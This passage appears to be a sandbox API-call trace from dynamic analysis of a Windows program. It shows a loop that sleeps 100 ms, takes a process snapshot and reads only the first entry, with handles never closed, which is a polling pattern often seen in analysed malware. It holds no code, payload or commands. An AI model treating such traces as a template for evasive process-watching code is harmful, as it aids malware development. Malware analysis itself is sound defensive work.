[0286.318] Sleep (dwMilliseconds=0x64) [0286.415] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaf8 [0286.417] Process32FirstW (in: hSnapshot=0xaf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.422] Sleep (dwMilliseconds=0x64) [0286.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xafc [0286.526] Process32FirstW (in: hSnapshot=0xafc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.531] Sleep (dwMilliseconds=0x64) [0286.633] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb00 [0286.635] Process32FirstW (in: hSnapshot=0xb00, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.640] Sleep (dwMilliseconds=0x64) [0286.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb04 [0286.744] Process32FirstW (in: hSnapshot=0xb04, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.750] Sleep (dwMilliseconds=0x64) [0286.852] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb08 [0286.853] Process32FirstW (in: hSnapshot=0xb08, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.859] Sleep (dwMilliseconds=0x64) [0286.961] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb0c [0286.963] Process32FirstW (in: hSnapshot=0xb0c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.968] Sleep (dwMilliseconds=0x64) [0287.070] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb10 [0287.072] Process32FirstW (in: hSnapshot=0xb10, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.077] Sleep (dwMilliseconds=0x64) [0287.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb14 [0287.182] Process32FirstW (in: hSnapshot=0xb14, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.187] Sleep (dwMilliseconds=0x64) [0287.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb18 [0287.290] Process32FirstW (in: hSnapshot=0xb18, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.295] Sleep (dwMilliseconds=0x64) [0287.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb1c [0287.399] Process32FirstW (in: hSnapshot=0xb1c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.405] Sleep (dwMilliseconds=0x64) [0287.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb20 [0287.510] Process32FirstW (in: hSnapshot=0xb20, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.516] Sleep (dwMilliseconds=0x64) [0287.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb24 [0287.617] Process32FirstW (in: hSnapshot=0xb24, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.623] Sleep (dwMilliseconds=0x64) [0287.725] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb28 [0287.727] Process32FirstW (in: hSnapshot=0xb28, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.732] Sleep (dwMilliseconds=0x64) [0287.835] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb2c [0287.836] Process32FirstW (in: hSnapshot=0xb2c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.842] Sleep (dwMilliseconds=0x64) [0287.944] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb30 [0287.945] Process32FirstW (in: hSnapshot=0xb30, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.951] Sleep (dwMilliseconds=0x64) [0288.053] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb34 [0288.054] Process32FirstW (in: hSnapshot=0xb34, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.060] Sleep (dwMilliseconds=0x64) [0288.162] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb38 [0288.164] Process32FirstW (in: hSnapshot=0xb38, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.169] Sleep (dwMilliseconds=0x64) [0288.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb3c [0288.273] Process32FirstW (in: hSnapshot=0xb3c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.279] Sleep (dwMilliseconds=0x64) [0288.380] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb40 [0288.382] Process32FirstW (in: hSnapshot=0xb40, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.388] Sleep (dwMilliseconds=0x64) [0288.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb44 [0288.491] Process32FirstW (in: hSnapshot=0xb44, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.497] Sleep (dwMilliseconds=0x64) [0288.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb48 [0288.602] Process32FirstW (in: hSnapshot=0xb48, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.607] Sleep (dwMilliseconds=0x64) [0288.709] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb4c [0288.710] Process32FirstW (in: hSnapshot=0xb4c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.716] Sleep (dwMilliseconds=0x64) [0288.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb50 [0288.819] Process32FirstW (in: hSnapshot=0xb50, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.825] Sleep (dwMilliseconds=0x64) [0288.927] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb54 [0288.928] Process32FirstW (in: hSnapshot=0xb54, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.933] Sleep (dwMilliseconds=0x64) [0289.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb58 [0289.037] Process32FirstW (in: hSnapshot=0xb58, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.044] Sleep (dwMilliseconds=0x64) [0289.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb5c [0289.146] Process32FirstW (in: hSnapshot=0xb5c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.152] Sleep (dwMilliseconds=0x64) [0289.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb60 [0289.256] Process32FirstW (in: hSnapshot=0xb60, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.261] Sleep (dwMilliseconds=0x64) [0289.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb64 [0289.365] Process32FirstW (in: hSnapshot=0xb64, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.370] Sleep (dwMilliseconds=0x64) [0289.473] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb68 [0289.474] Process32FirstW (in: hSnapshot=0xb68, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.480] Sleep (dwMilliseconds=0x64) [0289.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb6c [0289.584] Process32FirstW (in: hSnapshot=0xb6c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.589] Sleep (dwMilliseconds=0x64) [0289.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb70 [0289.692] Process32FirstW (in: hSnapshot=0xb70, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.698] Sleep (dwMilliseconds=0x64) [0289.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb74 [0289.801] Process32FirstW (in: hSnapshot=0xb74, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.807] Sleep (dwMilliseconds=0x64) [0289.909] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb78 [0289.911] Process32FirstW (in: hSnapshot=0xb78, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.917] Sleep (dwMilliseconds=0x64) [0290.019] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb7c [0290.020] Process32FirstW (in: hSnapshot=0xb7c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.026] Sleep (dwMilliseconds=0x64) [0290.137] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb80 [0290.138] Process32FirstW (in: hSnapshot=0xb80, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.144] Sleep (dwMilliseconds=0x64) [0290.279] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb84 [0290.281] Process32FirstW (in: hSnapshot=0xb84, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.287] Sleep (dwMilliseconds=0x64) [0290.393] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb88 [0290.395] Process32FirstW (in: hSnapshot=0xb88, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.400] Sleep (dwMilliseconds=0x64) [0290.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb8c [0290.504] Process32FirstW (in: hSnapshot=0xb8c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.509] Sleep (dwMilliseconds=0x64) [0290.611] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb90 [0290.613] Process32FirstW (in: hSnapshot=0xb90, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.618] Sleep (dwMilliseconds=0x64) [0290.721] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb94 [0290.722] Process32FirstW (in: hSnapshot=0xb94, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.729] Sleep (dwMilliseconds=0x64) [0290.830] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb98 [0290.831] Process32FirstW (in: hSnapshot=0xb98, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.837] Sleep (dwMilliseconds=0x64) [0290.939] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb9c [0290.940] Process32FirstW (in: hSnapshot=0xb9c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.946] Sleep (dwMilliseconds=0x64) [0291.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xba0 [0291.049] Process32FirstW (in: hSnapshot=0xba0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.055] Sleep (dwMilliseconds=0x64) [0291.157] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xba4 [0291.159] Process32FirstW (in: hSnapshot=0xba4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.165] Sleep (dwMilliseconds=0x64) [0291.267] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xba8 [0291.268] Process32FirstW (in: hSnapshot=0xba8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.275] Sleep (dwMilliseconds=0x64) [0291.376] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbac [0291.378] Process32FirstW (in: hSnapshot=0xbac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.385] Sleep (dwMilliseconds=0x64) [0291.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbb0 [0291.487] Process32FirstW (in: hSnapshot=0xbb0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.495] Sleep (dwMilliseconds=0x64) [0291.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbb4 [0291.596] Process32FirstW (in: hSnapshot=0xbb4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.602] Sleep (dwMilliseconds=0x64) [0291.706] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbb8 [0291.708] Process32FirstW (in: hSnapshot=0xbb8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.713] Sleep (dwMilliseconds=0x64) [0291.822] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbbc [0291.824] Process32FirstW (in: hSnapshot=0xbbc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.830] Sleep (dwMilliseconds=0x64) [0291.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbc0 [0291.939] Process32FirstW (in: hSnapshot=0xbc0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.944] Sleep (dwMilliseconds=0x64) [0292.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbc4 [0292.048] Process32FirstW (in: hSnapshot=0xbc4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.054] Sleep (dwMilliseconds=0x64) [0292.157] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbc8 [0292.159] Process32FirstW (in: hSnapshot=0xbc8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.164] Sleep (dwMilliseconds=0x64) [0292.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbcc [0292.266] Process32FirstW (in: hSnapshot=0xbcc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.272] Sleep (dwMilliseconds=0x64) [0292.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbd0 [0292.376] Process32FirstW (in: hSnapshot=0xbd0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.381] Sleep (dwMilliseconds=0x64) [0292.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbd4 [0292.485] Process32FirstW (in: hSnapshot=0xbd4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.490] Sleep (dwMilliseconds=0x64) [0292.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbd8 [0292.594] Process32FirstW (in: hSnapshot=0xbd8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.600] Sleep (dwMilliseconds=0x64) [0292.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbdc [0292.704] Process32FirstW (in: hSnapshot=0xbdc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.709] Sleep (dwMilliseconds=0x64) [0292.811] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbe0 [0292.812] Process32FirstW (in: hSnapshot=0xbe0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.818] Sleep (dwMilliseconds=0x64) [0292.920] 